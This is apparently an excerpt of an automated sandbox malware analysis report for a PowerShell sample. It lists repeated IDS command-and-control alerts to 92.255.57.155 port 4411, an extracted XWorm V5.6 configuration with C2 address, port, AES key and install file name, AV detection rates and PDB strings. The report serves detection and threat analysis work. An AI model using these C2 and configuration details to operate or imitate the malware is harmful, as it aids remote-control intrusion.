      2024-12-18T08:17:43.031938+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:43.671866+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:43.932846+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:44.535247+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:44.766252+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:45.189142+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:45.387574+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:45.500973+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:46.468434+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:46.699945+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:46.779221+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:46.891042+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:46.970230+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:47.161184+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:48.531507+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:48.720981+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:48.911994+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:49.007759+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:50.844659+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:50.996553+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:51.156239+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:51.347326+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:51.468916+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      2024-12-18T08:17:52.875960+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-18T08:15:33.902091+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:15:45.771661+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:15:57.674231+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:09.580469+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:21.486706+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:23.800469+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:24.060029+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:24.249538+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:24.341618+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:25.255032+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:25.503746+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:27.295911+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:28.083085+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:28.269318+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:28.562810+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:29.897905+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:30.164514+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:30.213412+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:30.359257+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:31.404817+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:31.524481+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:31.646166+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:31.937571+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:32.133889+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:32.362180+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:32.481784+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:33.186441+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:33.417459+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:33.697480+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:33.835284+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:33.997584+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:34.117799+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:34.240500+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:35.482478+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:35.822385+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:36.010043+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:36.130660+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:36.490754+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:36.781610+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:38.748427+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:38.909410+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:39.029084+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:39.148733+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:39.268439+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:41.205722+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:43.072733+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:43.253090+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:44.248195+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:44.893943+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:45.069824+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:45.207454+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:45.492026+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:47.049893+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:47.244129+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:47.364366+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:48.867349+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:49.070621+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:50.781213+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:50.959334+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:51.321655+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:51.735444+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:53.138080+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:53.361065+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:53.644963+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:54.391343+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:54.616929+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:55.862312+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:56.530712+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:56.909860+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:57.089201+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:57.369442+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:58.298171+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:58.726092+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:58.969995+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:16:59.107296+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:00.294866+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:00.971617+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:01.537876+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:01.642038+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:01.703951+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:01.823599+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:02.961974+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:03.082053+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:03.201778+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:03.326101+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:03.613897+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:03.773877+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:04.749398+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:05.038465+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:05.094986+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:05.321570+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:05.443227+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:05.649883+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:06.440028+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:06.824374+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:08.391954+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:08.624966+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:08.747170+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:10.535601+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:10.774991+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:10.901928+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:11.157785+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:11.597907+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:12.813169+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:12.934095+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:13.189536+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:13.608910+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:14.592855+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:14.712473+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:14.888749+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:15.013724+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:15.726905+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:15.982984+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:16.574935+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:18.797777+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:19.497918+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:20.267114+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:20.872027+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:21.142643+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:24.758271+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:25.074712+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:25.572080+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:26.719925+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:27.032137+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:27.151957+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:27.460864+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:28.978078+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:29.018032+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:29.098068+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:29.217880+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:29.337825+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:29.522691+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:29.869548+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:30.473988+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:30.661142+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:30.796469+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:32.563436+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:32.897617+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:32.961063+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:33.241746+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:33.565993+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:34.417678+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:34.611421+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:34.850456+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:35.216700+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:35.408863+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:35.657022+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:35.782028+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:36.105385+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:36.225137+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:37.440624+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:37.560192+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:37.679847+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:37.869345+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:38.568424+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:38.764531+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:40.110504+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:40.345812+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:40.957963+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:41.150302+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:43.032862+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:43.672845+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:43.933811+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:44.536859+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:45.190208+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:45.390835+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:45.514056+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:46.513963+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:46.701245+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:46.821964+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:46.941647+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:47.110123+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:47.229968+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:48.696917+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:48.819401+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:48.942109+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:49.062235+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:49.244958+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:50.845497+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:51.158128+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:51.308919+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:51.466955+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:51.628967+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      2024-12-18T08:17:55.454351+010028529231Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-18T08:15:28.448524+010028588011Malware Command and Control Activity Detected92.255.57.1554411192.168.2.649739TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-18T08:16:23.488331+010028587991Malware Command and Control Activity Detected192.168.2.64973992.255.57.1554411TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Found malware configuration
      Source: 00000004.00000002.3878649533.0000000003161000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["92.255.57.155"], "Port": 4411, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
      Multi AV Scanner detection for submitted file
      Source: NLXwvLjXPh.ps1ReversingLabs: Detection: 15%
      Source: NLXwvLjXPh.ps1Virustotal: Detection: 11%Perma Link
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
      Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegSvcs.exe, 00000004.00000002.3887271040.000000000A09A000.00000004.00000010.00020000.00000000.sdmp
      Source: Binary string: System.Xml.ni.pdb source: WER517A.tmp.dmp.11.dr
      Source: Binary string: HP$o0C:\Windows\mscorlib.pdb source: RegSvcs.exe, 00000004.00000002.3887271040.000000000A09A000.00000004.00000010.00020000.00000000.sdmp
      Source: Binary string: System.ni.pdbRSDS source: WER517A.tmp.dmp.11.dr
      Source: Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.2389124323.000001FF028D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2389124323.000001FF01638000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: System.Configuration.ni.pdb source: WER517A.tmp.dmp.11.dr
      Source: Binary string: @0o.pdb source: RegSvcs.exe, 00000004.00000002.3887271040.000000000A09A000.00000004.00000010.00020000.00000000.sdmp
      Source: Binary string: mscorlib.ni.pdbRSDS source: WER517A.tmp.dmp.11.dr
      Source: Binary string: System.Configuration.pdb source: WER517A.tmp.dmp.11.dr
      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbrn, source: RegSvcs.exe, 00000004.00000002.3885856490.00000000058B4000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Xml.pdb source: WER517A.tmp.dmp.11.dr
      Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbws source: RegSvcs.exe, 00000004.00000002.3885856490.0000000005887000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdb source: WER517A.tmp.dmp.11.dr
      Source: Binary string: System.Xml.ni.pdbRSDS# source: WER517A.tmp.dmp.11.dr
      Source: Binary string: System.Core.ni.pdb source: WER517A.tmp.dmp.11.dr
      Source: Binary string: Microsoft.VisualBasic.pdb source: WER517A.tmp.dmp.11.dr
      Source: Binary string: %%.pdb source: RegSvcs.exe, 00000004.00000002.3887271040.000000000A09A000.00000004.00000010.00020000.00000000.sdmp
      Source: Binary string: System.Windows.Forms.pdb source: WER517A.tmp.dmp.11.dr
      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb&G source: RegSvcs.exe, 00000004.00000002.3885856490.0000000005887000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\symbols\exe\RegSvcs.pdb source: RegSvcs.exe, 00000004.00000002.3885856490.0000000005887000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb source: RegSvcs.exe, 00000004.00000002.3887271040.000000000A09A000.00000004.00000010.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.3885856490.0000000005887000.00000004.00000020.00020000.00000000.sdmp, WER517A.tmp.dmp.11.dr
      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: RegSvcs.exe, 00000004.00000002.3885856490.0000000005887000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdbv source: RegSvcs.exe, 00000004.00000002.3885856490.0000000005887000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb246122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32 source: RegSvcs.exe, 00000004.00000002.3885856490.0000000005887000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER517A.tmp.dmp.11.dr
      Source: Binary string: System.Drawing.pdb source: WER517A.tmp.dmp.11.dr
      Source: Binary string: System.Management.pdb source: WER517A.tmp.dmp.11.dr
      Source: Binary string: mscorlib.ni.pdb source: WER517A.tmp.dmp.11.dr
      Source: Binary string: \??\C:\Windows\RegSvcs.pdb source: RegSvcs.exe, 00000004.00000002.3874168788.00000000013A7000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Management.ni.pdb source: WER517A.tmp.dmp.11.dr
      Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.PDB source: RegSvcs.exe, 00000004.00000002.3885856490.0000000005887000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: RegSvcs.exe, 00000004.00000002.3874168788.00000000013A7000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdb source: WER517A.tmp.dmp.11.dr
      Source: Binary string: symbols\dll\mscorlib.pdbLb source: RegSvcs.exe, 00000004.00000002.3887271040.000000000A09A000.00000004.00000010.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdbU source: RegSvcs.exe, 00000004.00000002.3885856490.0000000005887000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ?0oC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbD source: RegSvcs.exe, 00000004.00000002.3887271040.000000000A09A000.00000004.00000010.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbA source: RegSvcs.exe, 00000004.00000002.3885856490.0000000005887000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Drawing.pdb` source: WER517A.tmp.dmp.11.dr
